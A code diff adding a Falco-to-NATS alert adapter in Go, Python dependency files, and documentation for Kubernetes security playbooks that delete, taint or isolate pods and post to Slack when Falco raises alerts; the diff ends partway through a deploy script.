+golang utility wich reads Falco alerts from a named pipe and sends them to a
+NATS server.
+
+This utility is designed to being run in a sidecar container in the same
+Pod as Falco.
+
+## Configuration
+
+You have a [complete Kubernetes manifest available](https://github.com/draios/falco/tree/kubernetes-response-engine/deployment/falco/falco-daemonset.yaml) for future reading.
+
+Take a look at sidecar container and to the initContainers directive which
+craetes the shared pipe between containers.
+
+### Container image
+
+You have this adapter available as a container image. Its name is *sysdig/falco-nats*.
+
+### Parameters Reference
+
+* -s: Specifies the NATS server URL where message will be published.  By default
+    is: *nats://nats.nats-io.svc.cluster.local:4222*
+
+* -f: Specifies the named pipe path where Falco publishes its alerts. By default
+    is: */var/run/falco/nats*
--- a/integrations/kubernetes-response-engine/falco-nats/main.go
+++ b/integrations/kubernetes-response-engine/falco-nats/main.go
@@ -0,0 +1,100 @@
+// Copyright 2012-2018 The NATS Authors
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+
+// +build ignore
+
+package main
+
+import (
+	"bufio"
+	"encoding/json"
+	"flag"
+	"github.com/nats-io/go-nats"
+	"log"
+	"os"
+	"regexp"
+	"strings"
+)
+
+var slugRegularExpression = regexp.MustCompile("[^a-z0-9]+")
+
+func main() {
+	var urls = flag.String("s", "nats://nats.nats-io.svc.cluster.local:4222", "The nats server URLs (separated by comma)")
+	var pipePath = flag.String("f", "/var/run/falco/nats", "The named pipe path")
+
+	log.SetFlags(0)
+	flag.Usage = usage
+	flag.Parse()
+
+	nc, err := nats.Connect(*urls)
+	if err != nil {
+		log.Fatal(err)
+	}
+	defer nc.Close()
+
+	pipe, err := os.OpenFile(*pipePath, os.O_RDONLY, 0600)
+	if err != nil {
+		log.Fatal(err)
+	}
+
+	log.Printf("Opened pipe %s", *pipePath)
+
+	reader := bufio.NewReader(pipe)
+	scanner := bufio.NewScanner(reader)
+
+	log.Printf("Scanning %s", *pipePath)
+
+	for scanner.Scan() {
+		msg := []byte(scanner.Text())
+
+		subj, err := subjectAndRuleSlug(msg)
+		if err != nil {
+			log.Fatal(err)
+		}
+		nc.Publish(subj, msg)
+		nc.Flush()
+
+		if err := nc.LastError(); err != nil {
+			log.Fatal(err)
+		} else {
+			log.Printf("Published [%s] : '%s'\n", subj, msg)
+		}
+	}
+}
+
+func usage() {
+	log.Fatalf("Usage: nats-pub [-s server (%s)] <subject> <msg> \n", nats.DefaultURL)
+}
+
+type parsedAlert struct {
+	Priority string `json:"priority"`
+	Rule     string `json:"rule"`
+}
+
+func subjectAndRuleSlug(alert []byte) (string, error) {
+	var result parsedAlert
+	err := json.Unmarshal(alert, &result)
+
+	if err != nil {
+		return "", err
+	}
+
+	subject := "falco." + result.Priority + "." + slugify(result.Rule)
+	subject = strings.ToLower(subject)
+
+	return subject, nil
+}
+
+func slugify(input string) string {
+	return strings.Trim(slugRegularExpression.ReplaceAllString(strings.ToLower(input), "_"), "_")
+}
--- a/integrations/kubernetes-response-engine/playbooks/.gitignore
+++ b/integrations/kubernetes-response-engine/playbooks/.gitignore
@@ -0,0 +1,104 @@
+# Byte-compiled / optimized / DLL files
+__pycache__/
+*.py[cod]
+*$py.class
+
+# C extensions
+*.so
+
+# Distribution / packaging
+.Python
+build/
+develop-eggs/
+dist/
+downloads/
+eggs/
+.eggs/
+lib/
+lib64/
+parts/
+sdist/
+var/
+wheels/
+*.egg-info/
+.installed.cfg
+*.egg
+MANIFEST
+
+# PyInstaller
+#  Usually these files are written by a python script from a template
+#  before PyInstaller builds the exe, so as to inject date/other infos into it.
+*.manifest
+*.spec
+
+# Installer logs
+pip-log.txt
+pip-delete-this-directory.txt
+
+# Unit test / coverage reports
+htmlcov/
+.tox/
+.coverage
+.coverage.*
+.cache
+nosetests.xml
+coverage.xml
+*.cover
+.hypothesis/
+.pytest_cache/
+
+# Translations
+*.mo
+*.pot
+
+# Django stuff:
+*.log
+local_settings.py
+db.sqlite3
+
+# Flask stuff:
+instance/
+.webassets-cache
+
+# Scrapy stuff:
+.scrapy
+
+# Sphinx documentation
+docs/_build/
+
+# PyBuilder
+target/
+
+# Jupyter Notebook
+.ipynb_checkpoints
+
+# pyenv
+.python-version
+
+# celery beat schedule file
+celerybeat-schedule
+
+# SageMath parsed files
+*.sage.py
+
+# Environments
+.env
+.venv
+env/
+venv/
+ENV/
+env.bak/
+venv.bak/
+
+# Spyder project settings
+.spyderproject
+.spyproject
+
+# Rope project settings
+.ropeproject
+
+# mkdocs documentation
+/site
+
+# mypy
+.mypy_cache/
--- a/integrations/kubernetes-response-engine/playbooks/Pipfile
+++ b/integrations/kubernetes-response-engine/playbooks/Pipfile
@@ -0,0 +1,19 @@
+[[source]]
+url = "https://pypi.python.org/simple"
+verify_ssl = true
+name = "pypi"
+
+[dev-packages]
+mamba = "*"
+expects = "*"
+doublex = "*"
+doublex-expects = "==0.7.0rc2"
+
+[packages]
+kubernetes = "*"
+requests = "*"
+"e1839a8" = {path = ".", editable = true}
+maya = "*"
+
+[requires]
+python_version = "3.6"
--- a/integrations/kubernetes-response-engine/playbooks/Pipfile.lock
+++ b/integrations/kubernetes-response-engine/playbooks/Pipfile.lock
@@ -0,0 +1,367 @@
+{
+    "_meta": {
+        "hash": {
+            "sha256": "00ca5a9cb1f462d534a06bca990e987e75a05b7baf6ba5ddac529f03312135e6"
+        },
+        "pipfile-spec": 6,
+        "requires": {
+            "python_version": "3.6"
+        },
+        "sources": [
+            {
+                "name": "pypi",
+                "url": "https://pypi.python.org/simple",
+                "verify_ssl": true
+            }
+        ]
+    },
+    "default": {
+        "cachetools": {
+            "hashes": [
+                "sha256:90f1d559512fc073483fe573ef5ceb39bf6ad3d39edc98dc55178a2b2b176fa3",
+                "sha256:d1c398969c478d336f767ba02040fa22617333293fb0b8968e79b16028dfee35"
+            ],
+            "version": "==2.1.0"
+        },
+        "certifi": {
+            "hashes": [
+                "sha256:13e698f54293db9f89122b0581843a782ad0934a4fe0172d2a980ba77fc61bb7",
+                "sha256:9fa520c1bacfb634fa7af20a76bcbd3d5fb390481724c597da32c719a7dca4b0"
+            ],
+            "version": "==2018.4.16"
+        },
+        "chardet": {
+            "hashes": [
+                "sha256:84ab92ed1c4d4f16916e05906b6b75a6c0fb5db821cc65e70cbd64a3e2a5eaae",
+                "sha256:fc323ffcaeaed0e0a02bf4d117757b98aed530d9ed4531e3e15460124c106691"
+            ],
+            "version": "==3.0.4"
+        },
+        "dateparser": {
+            "hashes": [
+                "sha256:940828183c937bcec530753211b70f673c0a9aab831e43273489b310538dff86",
+                "sha256:b452ef8b36cd78ae86a50721794bc674aa3994e19b570f7ba92810f4e0a2ae03"
+            ],
+            "version": "==0.7.0"
+        },
+        "e1839a8": {
+            "editable": true,
+            "path": "."
+        },
+        "google-auth": {
+            "hashes": [
+                "sha256:1745c9066f698eac3da99cef082914495fb71bc09597ba7626efbbb64c4acc57",
+                "sha256:82a34e1a59ad35f01484d283d2a36b7a24c8c404a03a71b3afddd0a4d31e169f"
+            ],
+            "version": "==1.5.0"
+        },
+        "humanize": {
+            "hashes": [
+                "sha256:a43f57115831ac7c70de098e6ac46ac13be00d69abbf60bdcac251344785bb19"
+            ],
+            "version": "==0.5.1"
+        },
+        "idna": {
+            "hashes": [
+                "sha256:156a6814fb5ac1fc6850fb002e0852d56c0c8d2531923a51032d1b70760e186e",
+                "sha256:684a38a6f903c1d71d6d5fac066b58d7768af4de2b832e426ec79c30daa94a16"
+            ],
+            "version": "==2.7"
+        },
+        "ipaddress": {
+            "hashes": [
+                "sha256:64b28eec5e78e7510698f6d4da08800a5c575caa4a286c93d651c5d3ff7b6794",
+                "sha256:b146c751ea45cad6188dd6cf2d9b757f6f4f8d6ffb96a023e6f2e26eea02a72c"
+            ],
+            "version": "==1.0.22"
+        },
+        "kubernetes": {
+            "hashes": [
+                "sha256:b370ab4abd925309db69a14a4723487948e9a83de60ca92782ec14992b741c89",
+                "sha256:c80dcf531deca2037105df09c933355c80830ffbf9e496b5e6a3967ac6809ef7"
+            ],
+            "index": "pypi",
+            "version": "==6.0.0"
+        },
+        "maya": {
+            "hashes": [
+                "sha256:6f63bc69aa77309fc220bc02618da8701a21da87c2e7a747ee5ccd56a907c3a5",
+                "sha256:f526bc8596d993f4bd9755668f66aaf61d635bb4149e084d4a2bc0ebe42aa0b6"
+            ],
+            "index": "pypi",
+            "version": "==0.5.0"
+        },
+        "oauthlib": {
+            "hashes": [
+                "sha256:ac35665a61c1685c56336bda97d5eefa246f1202618a1d6f34fccb1bdd404162",
+                "sha256:d883b36b21a6ad813953803edfa563b1b579d79ca758fe950d1bc9e8b326025b"
+            ],
+            "version": "==2.1.0"
+        },
+        "pendulum": {
+            "hashes": [
+                "sha256:4173ce3e81ad0d9d61dbce86f4286c43a26a398270df6a0a89f501f0c28ad27d",
+                "sha256:56a347d0457859c84b8cdba161fc37c7df5db9b3becec7881cd770e9d2058b3c",
+                "sha256:738878168eb26e5446da5d1f7b3312ae993a542061be8882099c00ef4866b1a2",
+                "sha256:95536b33ae152e3c831eb236c1bf9ac9dcfb3b5b98fdbe8e9e601eab6c373897",
+                "sha256:c04fcf955e622e97e405e5f6d1b1f4a7adc69d79d82f3609643de69283170d6d",
+                "sha256:dd6500d27bb7ccc029d497da4f9bd09549bd3c0ea276dad894ea2fdf309e83f3",
+                "sha256:ddaf97a061eb5e2ae37857a8cb548e074125017855690d20e443ad8d9f31e164",
+                "sha256:e7df37447824f9af0b58c7915a4caf349926036afd86ad38e7529a6b2f8fc34b",
+                "sha256:e9732b8bb214fad2c72ddcbfec07542effa8a8b704e174347ede1ff8dc679cce",
+                "sha256:f4eee1e1735487d9d25cc435c519fd4380cb1f82cde3ebad1efbc2fc30deca5b"
+            ],
+            "version": "==1.5.1"
+        },
+        "pyasn1": {
+            "hashes": [
+                "sha256:2f57960dc7a2820ea5a1782b872d974b639aa3b448ac6628d1ecc5d0fe3986f2",
+                "sha256:3651774ca1c9726307560792877db747ba5e8a844ea1a41feb7670b319800ab3",
+                "sha256:602fda674355b4701acd7741b2be5ac188056594bf1eecf690816d944e52905e",
+                "sha256:8fb265066eac1d3bb5015c6988981b009ccefd294008ff7973ed5f64335b0f2d",
+                "sha256:9334cb427609d2b1e195bb1e251f99636f817d7e3e1dffa150cb3365188fb992",
+                "sha256:9a15cc13ff6bf5ed29ac936ca941400be050dff19630d6cd1df3fb978ef4c5ad",
+                "sha256:a66dcda18dbf6e4663bde70eb30af3fc4fe1acb2d14c4867a861681887a5f9a2",
+                "sha256:ba77f1e8d7d58abc42bfeddd217b545fdab4c1eeb50fd37c2219810ad56303bf",
+                "sha256:cdc8eb2eaafb56de66786afa6809cd9db2df1b3b595dcb25aa5b9dc61189d40a",
+                "sha256:d01fbba900c80b42af5c3fe1a999acf61e27bf0e452e0f1ef4619065e57622da",
+                "sha256:f281bf11fe204f05859225ec2e9da7a7c140b65deccd8a4eb0bc75d0bd6949e0",
+                "sha256:fb81622d8f3509f0026b0683fe90fea27be7284d3826a5f2edf97f69151ab0fc"
+            ],
+            "version": "==0.4.3"
+        },
+        "pyasn1-modules": {
+            "hashes": [
+                "sha256:041e9fbafac548d095f5b6c3b328b80792f006196e15a232b731a83c93d59493",
+                "sha256:0cdca76a68dcb701fff58c397de0ef9922b472b1cb3ea9695ca19d03f1869787",
+                "sha256:0cea139045c38f84abaa803bcb4b5e8775ea12a42af10019d942f227acc426c3",
+                "sha256:0f2e50d20bc670be170966638fa0ae603f0bc9ed6ebe8e97a6d1d4cef30cc889",
+                "sha256:47fb6757ab78fe966e7c58b2030b546854f78416d653163f0ce9290cf2278e8b",
+                "sha256:598a6004ec26a8ab40a39ea955068cf2a3949ad9c0030da970f2e1ca4c9f1cc9",
+                "sha256:72fd8b0c11191da088147c6e4678ec53e573923ecf60b57eeac9e97433e09fc2",
+                "sha256:854700bbdd01394e2ada9c1bfbd0ed9f5d0c551350dbbd023e88b11d2771ae06",
+                "sha256:af00ea8f2022b6287dc375b2c70f31ab5af83989fc6fe9eacd4976ce26cd7ccc",
+                "sha256:b1f395cae2d669e0830cb023aa86f9f283b7a9aa32317d7f80d8e78aa2745812",
+                "sha256:c6747146e95d2b14cc2a8399b2b0bde3f93778f8f9ec704690d2b589c376c137",
+                "sha256:f53fe5bcebdf318f51399b250fe8325ef3a26d927f012cc0c8e0f9e9af7f9deb"
+            ],
+            "version": "==0.2.1"
+        },
+        "python-dateutil": {
+            "hashes": [
+                "sha256:1adb80e7a782c12e52ef9a8182bebeb73f1d7e24e374397af06fb4956c8dc5c0",
+                "sha256:e27001de32f627c22380a688bcc43ce83504a7bc5da472209b4c70f02829f0b8"
+            ],
+            "version": "==2.7.3"
+        },
+        "pytz": {
+            "hashes": [
+                "sha256:65ae0c8101309c45772196b21b74c46b2e5d11b6275c45d251b150d5da334555",
+                "sha256:c06425302f2cf668f1bba7a0a03f3c1d34d4ebeef2c72003da308b3947c7f749"
+            ],
+            "version": "==2018.4"
+        },
+        "pytzdata": {
+            "hashes": [
+                "sha256:1d936da41ee06216d89fdc7ead1ee9a5da2811a8787515a976b646e110c3f622",
+                "sha256:e4ef42e82b0b493c5849eed98b5ab49d6767caf982127e9a33167f1153b36cc5"
+            ],
+            "version": "==2018.5"
+        },
+        "pyyaml": {
+            "hashes": [
+                "sha256:0c507b7f74b3d2dd4d1322ec8a94794927305ab4cebbe89cc47fe5e81541e6e8",
+                "sha256:16b20e970597e051997d90dc2cddc713a2876c47e3d92d59ee198700c5427736",
+                "sha256:3262c96a1ca437e7e4763e2843746588a965426550f3797a79fca9c6199c431f",
+                "sha256:326420cbb492172dec84b0f65c80942de6cedb5233c413dd824483989c000608",
+                "sha256:4474f8ea030b5127225b8894d626bb66c01cda098d47a2b0d3429b6700af9fd8",
+                "sha256:592766c6303207a20efc445587778322d7f73b161bd994f227adaa341ba212ab",
+                "sha256:5ac82e411044fb129bae5cfbeb3ba626acb2af31a8d17d175004b70862a741a7",
+                "sha256:5f84523c076ad14ff5e6c037fe1c89a7f73a3e04cf0377cb4d017014976433f3",
+                "sha256:827dc04b8fa7d07c44de11fabbc888e627fa8293b695e0f99cb544fdfa1bf0d1",
+                "sha256:b4c423ab23291d3945ac61346feeb9a0dc4184999ede5e7c43e1ffb975130ae6",
+                "sha256:bc6bced57f826ca7cb5125a10b23fd0f2fff3b7c4701d64c439a300ce665fff8",
+                "sha256:c01b880ec30b5a6e6aa67b09a2fe3fb30473008c85cd6a67359a1b15ed6d83a4",
+                "sha256:ca233c64c6e40eaa6c66ef97058cdc80e8d0157a443655baa1b2966e812807ca",
+                "sha256:e863072cdf4c72eebf179342c94e6989c67185842d9997960b3e69290b2fa269"
+            ],
+            "version": "==3.12"
+        },
+        "regex": {
+            "hashes": [
+                "sha256:0201b4cb42f03842a75044a3d08b62a79114f753b33ee421182c631d9f5c81f5",
+                "sha256:204524604456e3e0e25c3f24da4efc43db78edfe7623f1049e03d3aa51ddda48",
+                "sha256:24c0e838bde42fe9d4d5650e75bff2d4bb5867968fb9409331dbe39154f6e8e2",
+                "sha256:4360143da844cd985effb7fb9af04beaa2d371ab13e4a1996424aa2f6fbfb877",
+                "sha256:4b8c6fd44dbd46cdbf755c20a7b9dedb32b8d15b707a0e470dfa66ba5df00a35",
+                "sha256:4fb5622987f3863cfa76c40ab3338a7dc8ed2bac236bb53e638b21ea397a3252",
+                "sha256:5eebefef6e3d97e4c1f9f77eac6555c32ed3afbd769955a9f7339256a4d50d6c",
+                "sha256:7222204c6acb9e52688678ec7306b2dfd84df68bc8eb251be74fec4e9dd85bf9",
+                "sha256:809cbbcbe291cf7bc9cf6aeac6a9a400a71318292d0a2a07effaf4b4782203a0",
+                "sha256:9c9075c727afec23eab196be51737eedb00cd67bb4a2e0170fa8dc65163838f3",
+                "sha256:a105b1d7287d412e8fe99959c1b80f7cbd76184b6466d63579b6d256a406a76e",
+                "sha256:c3d9cfd214a3e5a25f2da9817c389e32069e210b067ebb901e10f3270da9b259",
+                "sha256:c3ebfb5ec2dd750f7861734b25ea7d5ae89d6f33b427cccf3cafa36a1511d862",
+                "sha256:c670acd71d975b0c91579d40ae7f703d0daa1c871f12e46394a2c7be0ec8e217",
+                "sha256:e371482ee3e6e5ca19ea83cdfc84bf69cac230e3cb1073c8c3bebf3f143cd7a5"
+            ],
+            "version": "==2018.6.9"
+        },
+        "requests": {
+            "hashes": [
+                "sha256:63b52e3c866428a224f97cab011de738c36aec0185aa91cfacd418b5d58911d1",
+                "sha256:ec22d826a36ed72a7358ff3fe56cbd4ba69dd7a6718ffd450ff0e9df7a47ce6a"
+            ],
+            "index": "pypi",
+            "version": "==2.19.1"
+        },
+        "requests-oauthlib": {
+            "hashes": [
+                "sha256:8886bfec5ad7afb391ed5443b1f697c6f4ae98d0e5620839d8b4499c032ada3f",
+                "sha256:e21232e2465808c0e892e0e4dbb8c2faafec16ac6dc067dd546e9b466f3deac8",
+                "sha256:fe3282f48fb134ee0035712159f5429215459407f6d5484013343031ff1a400d"
+            ],
+            "version": "==1.0.0"
+        },
+        "rsa": {
+            "hashes": [
+                "sha256:25df4e10c263fb88b5ace923dd84bf9aa7f5019687b5e55382ffcdb8bede9db5",
+                "sha256:43f682fea81c452c98d09fc316aae12de6d30c4b5c84226642cf8f8fd1c93abd"
+            ],
+            "version": "==3.4.2"
+        },
+        "six": {
+            "hashes": [
+                "sha256:70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9",
+                "sha256:832dc0e10feb1aa2c68dcc57dbb658f1c7e65b9b61af69048abc87a2db00a0eb"
+            ],
+            "version": "==1.11.0"
+        },
+        "snaptime": {
+            "hashes": [
+                "sha256:e3f1eb89043d58d30721ab98cb65023f1a4c2740e3b197704298b163c92d508b"
+            ],
+            "version": "==0.2.4"
+        },
+        "tzlocal": {
+            "hashes": [
+                "sha256:4ebeb848845ac898da6519b9b31879cf13b6626f7184c496037b818e238f2c4e"
+            ],
+            "version": "==1.5.1"
+        },
+        "urllib3": {
+            "hashes": [
+                "sha256:a68ac5e15e76e7e5dd2b8f94007233e01effe3e50e8daddf69acfd81cb686baf",
+                "sha256:b5725a0bd4ba422ab0e66e89e030c806576753ea3ee08554382c14e685d117b5"
+            ],
+            "version": "==1.23"
+        },
+        "websocket-client": {
+            "hashes": [
+                "sha256:18f1170e6a1b5463986739d9fd45c4308b0d025c1b2f9b88788d8f69e8a5eb4a",
+                "sha256:db70953ae4a064698b27ae56dcad84d0ee68b7b43cb40940f537738f38f510c1"
+            ],
+            "version": "==0.48.0"
+        }
+    },
+    "develop": {
+        "args": {
+            "hashes": [
+                "sha256:a785b8d837625e9b61c39108532d95b85274acd679693b71ebb5156848fcf814"
+            ],
+            "version": "==0.1.0"
+        },
+        "clint": {
+            "hashes": [
+                "sha256:05224c32b1075563d0b16d0015faaf9da43aa214e4a2140e51f08789e7a4c5aa"
+            ],
+            "version": "==0.5.1"
+        },
+        "coverage": {
+            "hashes": [
+                "sha256:03481e81d558d30d230bc12999e3edffe392d244349a90f4ef9b88425fac74ba",
+                "sha256:0b136648de27201056c1869a6c0d4e23f464750fd9a9ba9750b8336a244429ed",
+                "sha256:104ab3934abaf5be871a583541e8829d6c19ce7bde2923b2751e0d3ca44db60a",
+                "sha256:15b111b6a0f46ee1a485414a52a7ad1d703bdf984e9ed3c288a4414d3871dcbd",
+                "sha256:198626739a79b09fa0a2f06e083ffd12eb55449b5f8bfdbeed1df4910b2ca640",
+                "sha256:1c383d2ef13ade2acc636556fd544dba6e14fa30755f26812f54300e401f98f2",
+                "sha256:28b2191e7283f4f3568962e373b47ef7f0392993bb6660d079c62bd50fe9d162",
+                "sha256:2eb564bbf7816a9d68dd3369a510be3327f1c618d2357fa6b1216994c2e3d508",
+                "sha256:337ded681dd2ef9ca04ef5d93cfc87e52e09db2594c296b4a0a3662cb1b41249",
+                "sha256:3a2184c6d797a125dca8367878d3b9a178b6fdd05fdc2d35d758c3006a1cd694",
+                "sha256:3c79a6f7b95751cdebcd9037e4d06f8d5a9b60e4ed0cd231342aa8ad7124882a",
+                "sha256:3d72c20bd105022d29b14a7d628462ebdc61de2f303322c0212a054352f3b287",
+                "sha256:3eb42bf89a6be7deb64116dd1cc4b08171734d721e7a7e57ad64cc4ef29ed2f1",
+                "sha256:4635a184d0bbe537aa185a34193898eee409332a8ccb27eea36f262566585000",
+                "sha256:56e448f051a201c5ebbaa86a5efd0ca90d327204d8b059ab25ad0f35fbfd79f1",
+                "sha256:5a13ea7911ff5e1796b6d5e4fbbf6952381a611209b736d48e675c2756f3f74e",
+                "sha256:69bf008a06b76619d3c3f3b1983f5145c75a305a0fea513aca094cae5c40a8f5",
+                "sha256:6bc583dc18d5979dc0f6cec26a8603129de0304d5ae1f17e57a12834e7235062",
+                "sha256:701cd6093d63e6b8ad7009d8a92425428bc4d6e7ab8d75efbb665c806c1d79ba",
+                "sha256:7608a3dd5d73cb06c531b8925e0ef8d3de31fed2544a7de6c63960a1e73ea4bc",
+                "sha256:76ecd006d1d8f739430ec50cc872889af1f9c1b6b8f48e29941814b09b0fd3cc",
+                "sha256:7aa36d2b844a3e4a4b356708d79fd2c260281a7390d678a10b91ca595ddc9e99",
+                "sha256:7d3f553904b0c5c016d1dad058a7554c7ac4c91a789fca496e7d8347ad040653",
+                "sha256:7e1fe19bd6dce69d9fd159d8e4a80a8f52101380d5d3a4d374b6d3eae0e5de9c",
+                "sha256:8c3cb8c35ec4d9506979b4cf90ee9918bc2e49f84189d9bf5c36c0c1119c6558",
+                "sha256:9d6dd10d49e01571bf6e147d3b505141ffc093a06756c60b053a859cb2128b1f",
+                "sha256:9e112fcbe0148a6fa4f0a02e8d58e94470fc6cb82a5481618fea901699bf34c4",
+                "sha256:ac4fef68da01116a5c117eba4dd46f2e06847a497de5ed1d64bb99a5fda1ef91",
+                "sha256:b8815995e050764c8610dbc82641807d196927c3dbed207f0a079833ffcf588d",
+                "sha256:be6cfcd8053d13f5f5eeb284aa8a814220c3da1b0078fa859011c7fffd86dab9",
+                "sha256:c1bb572fab8208c400adaf06a8133ac0712179a334c09224fb11393e920abcdd",
+                "sha256:de4418dadaa1c01d497e539210cb6baa015965526ff5afc078c57ca69160108d",
+                "sha256:e05cb4d9aad6233d67e0541caa7e511fa4047ed7750ec2510d466e806e0255d6",
+                "sha256:e4d96c07229f58cb686120f168276e434660e4358cc9cf3b0464210b04913e77",
+                "sha256:f3f501f345f24383c0000395b26b726e46758b71393267aeae0bd36f8b3ade80",
+                "sha256:f8a923a85cb099422ad5a2e345fe877bbc89a8a8b23235824a93488150e45f6e"
+            ],
+            "version": "==4.5.1"
+        },
+        "doublex": {
+            "hashes": [
+                "sha256:062af49d9e4148bc47b7512d3fdc8e145dea4671d074ffd54b2464a19d3757ab"
+            ],
+            "index": "pypi",
+            "version": "==1.8.4"
+        },
+        "doublex-expects": {
+            "hashes": [
+                "sha256:5421bd92319c77ccc5a81d595d06e9c9f7f670de342b33e8007a81e70f9fade8"
+            ],
+            "index": "pypi",
+            "version": "==0.7.0rc2"
+        },
+        "expects": {
+            "hashes": [
+                "sha256:37538d7b0fa9c0d53e37d07b0e8c07d89754d3deec1f0f8ed1be27f4f10363dd"
+            ],
+            "index": "pypi",
+            "version": "==0.8.0"
+        },
+        "mamba": {
+            "hashes": [
+                "sha256:63e70a8666039cf143a255000e23f29be4ea4b5b8169f2b053f94eb73a2ea9e2"
+            ],
+            "index": "pypi",
+            "version": "==0.9.3"
+        },
+        "pyhamcrest": {
+            "hashes": [
+                "sha256:6b672c02fdf7470df9674ab82263841ce8333fb143f32f021f6cb26f0e512420",
+                "sha256:7a4bdade0ed98c699d728191a058a60a44d2f9c213c51e2dd1e6fb42f2c6128a",
+                "sha256:8ffaa0a53da57e89de14ced7185ac746227a8894dbd5a3c718bf05ddbd1d56cd",
+                "sha256:bac0bea7358666ce52e3c6c85139632ed89f115e9af52d44b3c36e0bf8cf16a9",
+                "sha256:f30e9a310bcc1808de817a92e95169ffd16b60cbc5a016a49c8d0e8ababfae79"
+            ],
+            "version": "==1.9.0"
+        },
+        "six": {
+            "hashes": [
+                "sha256:70e8a77beed4562e7f14fe23a786b54f6296e34344c23bc42f07b15018ff98e9",
+                "sha256:832dc0e10feb1aa2c68dcc57dbb658f1c7e65b9b61af69048abc87a2db00a0eb"
+            ],
+            "version": "==1.11.0"
+        }
+    }
+}
--- a/integrations/kubernetes-response-engine/playbooks/README.md
+++ b/integrations/kubernetes-response-engine/playbooks/README.md
@@ -0,0 +1,164 @@
+# Playbooks
+
+Following [owasp ideas](https://owaspsummit.org/Working-Sessions/Security-Playbooks/index.html),
+playbooks are workflows and prescriptive instructions on how to handle specific
+Security activities or incidents.
+
+Being more specific, playbooks are actions that are going to be executed when
+Falco finds a weird behavior in our Kubernetes cluster. We have implemented
+them with Python and we have found that several Serverless concepts fits well
+with playbooks, so we use [Kubeless](https://kubeless.io/) for its deployment.
+
+## Requirements
+
+* A working Kubernetes cluster
+* [kubeless cli executable](https://kubeless.io/docs/quick-start/)
+* Python 3.6
+* pipenv
+
+## Deploying a playbook
+
+Deploying a playbook involves a couple of components, the function that is going
+to be with Kubeless and a trigger for that function.
+
+We have automated those steps in a generic script *deploy_playbook* who packages
+the reaction and its dependencies, uploads to Kubernetes and creates the kubeless
+trigger.
+
+```
+./deploy_playbook -p slack -e SLACK_WEBHOOK_URL="https://..." -t "falco.error.*" -t "falco.info.*"
+```
+
+### Parameters
+
+* -p: The playbook to deploy, it must match with the top-level script. In this
+    example *slack.py* that contains the wiring between playbooks and Kubeless
+    functions
+
+* -e: Sets configuration settings for Playbook. In this case the URL where we
+    have to post messages. You can specify multiple *-e* flags.
+
+* -t: Topic to susbcribe. You can specify multiple *-t* flags and a trigger
+    will be created for each topic, so when we receive a message in that topic,
+    our function will be ran. In this case, playbook will be run when a
+    falco.error or falco.info alert is raised.
+
+### Kubeless 101
+
+Under the hood, there are several useful commands for checking function state with kubeless.
+
+
+We can retrieve all functions deployed in our cluster:
+```
+kubeless function list
+```
+
+And we can see several interesting stats about a function usage:
+```
+kubeless function top
+```
+
+And we can see bindings between functions and NATS topics:
+```
+kubeless trigger nats list
+```
+
+### Undeploying a function
+
+You have to delete every component using kubeless cli tool.
+
+Generally, it takes 2 steps: Remove the triggers and remove the function.
+
+Remove the triggers:
+```
+kubeless trigger nats delete trigger-name
+```
+
+If you have deployed with the script, trigger-name look like:
+*falco-<playbook>-trigger-<index>* where index is the index of the topic created.
+Anyway, you can list all triggers and select the name.
+
+
+Remove the function:
+```
+kubeless function delete function-name
+```
+
+If you have deployed with the script, the function name will start with *falco-<playbook>*,
+but you can list all functions and select its name.
+
+## Testing
+
+One of the goals of the project was that playbooks were tested.
+
+You can execute the tests with:
+
+```
+pipenv --three install -d
+export KUBERNETES_LOAD_KUBE_CONFIG=1
+pipenv run mamba --format=documentation
+```
+
+The first line install development tools, which includes test runner and assertions.
+The second one tells Kubernetes Client to use the same configuration than kubectl and
+the third one runs the test.
+
+The tests under *specs/infrastructure* runs against a real Kubernetes cluster,
+but the *spec/reactions* can be run without any kind of infrastructure.
+
+## Available Playbooks
+
+### Delete a Pod
+
+This playbook kills a pod using Kubernetes API
+
+```
+./deploy_playbook -p delete -t "falco.notice.terminal_shell_in_container"
+```
+
+In this example, everytime we receive a *Terminal shell in container* alert from
+Falco, that pod will be deleted.
+
+### Send message to Slack
+
+This playbook posts a message to Slack
+
+```
+./deploy_playbook -p slack -t "falco.error.*" -e SLACK_WEBHOOK_URL="https://..."
+```
+
+#### Parameters
+
+* SLACK_WEBHOOK_URL: This is the webhook used for posting messages in Slack
+
+In this example, when Falco raises an error we will be notified in Slack
+
+### Taint a Node
+
+This playbook taints the node which where pod is running.
+
+```
+$ ./deploy_playbook -p taint -t “falco.notice.contact_k8s_api_server_from_container”
+```
+
+#### Parameters:
+* TAINT_KEY: This is the taint key. Default value: ‘falco/alert’
+* TAINT_VALUE: This is the taint value. Default value: ‘true’
+* TAINT_EFFECT: This is the taint effect. Default value: ‘NoSchedule’
+
+In this example, we avoid scheduling in the node which originates the Contact
+K8S API server from container.  But we can use a more aggresive approach and
+use -e TAINT_EFFECT=NoExecute
+
+### Network isolate a Pod
+
+This reaction denies all ingress/egress traffic from a Pod. It's intended to
+be used with Calico or other similar projects for managing networking in
+Kubernetes.
+
+```
+./deploy_playbook -p isolate -t “falco.notice.write_below_binary_dir” -t “falco.error.write_below_etc”
+```
+
+So as soon as we notice someone wrote under /bin (and additional binaries) or
+/etc, we disconnect that pod. It's like a trap for our attackers.
--- a/integrations/kubernetes-response-engine/playbooks/delete.py
+++ b/integrations/kubernetes-response-engine/playbooks/delete.py
@@ -0,0 +1,16 @@
+import sys
+import os.path
+sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__))))
+
+import os
+import playbooks
+from playbooks import infrastructure
+
+
+playbook = playbooks.DeletePod(
+    infrastructure.KubernetesClient()
+)
+
+
+def handler(event, context):
+    playbook.run(event['data'])
--- a/integrations/kubernetes-response-engine/playbooks/deploy_playbook
+++ b/integrations/kubernetes-response-engine/playbooks/deploy_playbook
@@ -0,0 +1,68 @@
+#!/bin/bash
+#
+# Deploys a playbook
+
+set -e
+
+function usage() {
+  cat<<EOF
+Usage: $0 [options]
+
+-p playbook     Playbook to be deployed. Is the script for Kubeless: slack, taint, isolate.
+-e environment  Environment variables for the Kubeless function.  You can pass multiple environment variables passing several -e parameters.
